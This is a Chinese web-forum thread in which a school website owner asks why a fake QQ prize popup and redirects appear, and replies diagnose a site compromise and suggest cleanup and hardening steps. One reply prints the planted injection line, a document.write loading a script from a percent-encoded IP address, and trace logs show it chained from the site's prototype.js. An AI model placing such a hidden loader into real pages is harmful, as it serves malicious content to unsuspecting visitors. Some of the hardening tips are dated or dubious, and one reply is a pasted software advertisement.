1   1  /  1  页   跳转

网站弹出QQ对话框

网站弹出QQ对话框

高手们,我的网站http://yhsxw.vicp.net/第一次一打开就出现QQ中奖对话框,几秒钟后就消失。如果双击打开就出现http://211.64.8.6/eduit/ad/a.asp,然后立刻变成了http://www.qqzx2010.com/每天变换一个网址。
我把服务器查杀了n次,均无果。我担心老师们的机器中了病毒和木马,近几天的一些资料都不敢上传了。请大侠们支招

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; 360SE)
分享到:
gototop
 

回复:网站弹出QQ对话框

Log generated by byxxdrls use mdecoder 0.46
[root]http://yhsxw.vicp.net/(运河数学网 >> 网站首页)
    [script]http://yhsxw.vicp.net/JS/prototype.js
        [script]http://211.64.8.6/eduit/ad/a.js
    [script]http://yhsxw.vicp.net/JS/scriptaculous.js
    [script]http://yhsxw.vicp.net/JS/checklogin.js
    [script]http://yhsxw.vicp.net/js/menu.js
    [script]http://yhsxw.vicp.net/js/date.js
    [script]http://yhsxw.vicp.net/count/CounterLink.asp?style=simple
        [script]http://yhsxw.vicp.net/count/counter.asp?style=&Referer=+
    [script]http://yhsxw.vicp.net/bbs/Dv_News.asp?GetName=newtopic
    [script]http://yhsxw.vicp.net/oblog45/js.asp?
j=0&classid=all&subjectname=1&classname=1&tlen=16&n=5&sdate=90&orders=2&info=1&action=1&use


document.write('<SCRIPT src="http://%32%31%31%2E%36%34%2E%38%2E%36/%65%64%75%69%74/%61%64/%61%2E%6A%73"></script>');
gototop
 

回复:网站弹出QQ对话框

网站可能被挂马了。
网站被挂马,这是普遍的现象!

先说下木马的清除:
1.整站被挂马,最快速的恢复方法是,除开数据库、上传目录之外,替换掉其他所有文件;
2.仔细检查网站上传目录存放的文件,很多木马伪装成图片保存在上传目录,你直接把上传文件夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除;
3.数据库里面存在木马,则把数据库的木马代码清除!可以采用查找替换;
4.如果网站源文件没有,则需要FTP下载网站文件,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查!

再说如何防止网站挂马:
1.网站的所有后台文件,都需要进行管理员验证;
2.数据库,如果是ACCESS,则必须变更数据库名,并且变更文件格式,如果db.mdb,可以换成~!abc@#.asp;
3.修改网站后台的文件夹名称,一般常用的是admin,建议改成另外的;
4.网站少用一些验证码;
5.网站的上传组件,最好是进行严格的限制;
6.网站前台调用的图片,必须存放在根目录文件夹,不要暴露后台地址;
7.在样式里面写入一些屏蔽样式,使一些ifram,js挂马代码无效;
8.如果你的网站虚拟主机具备读写权限设置功能,那可以对网站的文件夹进行权限设置,这样就能够完全有效的阻止网站被挂马!
gototop
 

回复:网站弹出QQ对话框

LZ你好~

Log is generated by FreShow.
[wide]http://yhsxw.vicp.net
    [script]http://yhsxw.vicp.net/JS/prototype.js
        [script]http://%32%31%31%2E%36%34%2E%38%2E%36/%65%64%75%69%74/%61%64/%61%2E%6A%73
            [object]http://211.64.8.6/eduit/ad/system.wav
            [object]http://211.64.8.6/eduit/ad/qq1.gif
    [script]http://yhsxw.vicp.net/JS/scriptaculous.js
    [script]http://yhsxw.vicp.net/JS/checklogin.js
    [script]http://yhsxw.vicp.net/js/menu.js
    [script]http://yhsxw.vicp.net/js/date.js
    [script]http://yhsxw.vicp.net/count/CounterLink.asp?style=simple
    [script]http://yhsxw.vicp.net/bbs/Dv_News.asp?GetName=newtopic

此网站有挂马。相关解决方法请参见:
http://wenku.baidu.com/view/7ca0437302768e9951e738a8.html
gototop
 

回复:网站弹出QQ对话框

这个是花生壳做的网站吧,可能是您的网络知识也不是很丰富,对于网站的源码建议选择公认的比较好的。
及时的关注此源码官网的最新消息,避免漏洞被利用挂马现象的发生。

以上已经给出了网马分析。
gototop
 

回复:网站弹出QQ对话框

我这里打开网站速度很慢
要深入,要专一.......
gototop
 

回复:网站弹出QQ对话框

网站被挂马了,去清除一下吧。
楼上已经给出了答案,
gototop
 

回复:网站弹出QQ对话框

下载个IE修复专家

★★从V5.06版开始,本软件改为免费版★★
【1】修复功能:可修复IE标题栏、首页、右键菜单、工具栏按钮、工具栏菜单、附加工具栏(如百度搜霸、Google工具栏、搜狐工具栏等)、OutLook标题等;全面修复各项Internet选项,包括常规,安全,连接,内容,高级等所有选项设置;并提供"一键修复"功能,单击即可自动修复所有设置。
【2】自动保护功能:实时保护IE首页、右键、工具栏、菜单、OutLook标题、Internet选项,启动项目等多达十余项相关设置,使你的IE得以安全保护,不再受到恶意网站的攻击。
【3】自动拦截弹出广告功能(支持拦截"信使服务"窗口):最大的特点是智能化识别广告窗口,它只拦截广告窗口,不会误杀正常的弹出窗口;它在广告窗口还未弹出产生之前就将其拦截,能有效拦截99.9%的弹出广告窗口,节省了系统资源,加速上网浏览。
1).提供“友好网址”功能:当你访问"友好网址"时,IE修复专家不会拦截弹出的任何网页窗口。支持任意添加、修改、删除"友好网址"。
2).提供“拦截日志”记录:所有被拦截的广告网址都被记录下来,可以将你不希望被拦截的网址直接添加到"友好网址"中。
3).提供“拦截提示”:在广告窗口被拦截时,会有浮动窗口提示、声效提示、系统托盘区图标闪动等多种提示,让你对被拦截广告一目了然。
【4】"IE修复专家工具栏":集成在IE工具栏中,提供一系列方便实用的功能。包括:
1).搜索功能:包括GOOGLE搜索、百度搜索、MP3搜索、软件搜索、电影搜索、新闻搜索等。
2).保存网页:可一键下载保存当前网页。
3).其它选项设置:包括多媒体选项设置、广告拦截开关、自动锁定IE窗口大小和位置、新建IE窗口等设置。
【5】网址整理功能:包括IE收藏夹网址这里,以及IE地址栏下拉框的历史网址整理;
【6】启动项目管理功能:可以非常方便的管理启动时自动运行的程序;包括添加、删除、备份、恢复等功能。
【7】进程管理功能:可以终止任何正在运行的程序,包括隐藏运行的恶意程序;
【8】隐私安全设置:包括安全限制、历史记录、临时文件、Cookie等设置;
【9】其它设置:IE外观个性设置,IE自动搜索顺序设置,输入法顺序设置,相关系统路径设置,托盘区时间栏设置等。
【10】支持软件的自动在线升级:可自动检测最新版本,并全自动升级下载安装,无需人工干预即可完成软件的升
gototop
 

回复:网站弹出QQ对话框

从日志看,网站被挂码了,用楼上的方法解决。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT